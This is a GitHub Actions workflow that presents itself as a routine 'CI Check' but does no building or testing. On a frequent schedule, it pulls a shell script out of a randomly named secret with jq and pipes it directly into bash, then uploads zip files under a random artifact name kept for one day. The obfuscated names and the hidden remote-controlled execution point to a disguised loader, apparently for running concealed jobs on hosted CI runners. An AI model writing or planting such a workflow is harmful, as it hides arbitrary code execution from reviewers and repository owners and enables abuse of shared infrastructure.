name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '32 4,10,16,22 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Deploy
        env:
          vu5469: ${{ secrets.vu5469 }}
        run: |
          printf '%s' "$vu5469" | jq -r .llx34056 | /bin/bash
          echo $sznh11420 | jq -r .f8 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: AqcRsRAu
          path: "*.zip"
          retention-days: 1
